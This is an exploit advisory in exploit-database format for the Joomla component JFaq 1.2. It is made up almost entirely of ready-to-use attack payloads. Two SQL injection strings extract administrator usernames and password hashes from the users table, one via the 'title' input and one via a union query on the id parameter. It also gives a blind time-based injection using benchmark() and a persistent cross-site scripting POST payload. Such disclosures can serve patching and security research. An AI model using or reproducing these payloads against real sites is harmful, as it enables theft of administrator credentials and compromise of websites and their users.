# Exploit Title: Joomla Component JFaq 1.2 Multiple Vulnerabilities
# Date: 11 May 2010
# Author: jdc
# Version: 1.2
# Tested on: PHP5, MySQL5
"title" input SQL injection
---------------------------
title', (select concat(username,char(32),password) from #__users where
gid=25 limit 1), 1, 1, 1, 1, 1) -- '
id SQL injection
----------------
requires: magic quotes OFF, Joomla debug mode OFF
?option=com_jfaq
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9
from jos_users where gid=25 -- '
id Blind SQL injection
----------------------
requires: magic quotes OFF
?option=com_jfaq
&task=categ
&id=-1' union select benchmark(1000000,md5(5)) -- '
Persistent XSS
--------------
requires: a method to manually POST to form
postdata:
option=com_jfaq
task=add2
visitor_name=foo
categ=1
titlu=bar
question=<img src="f" onerror="alert(1);//"
NOTE: cannot be manually input - editor script strips exploit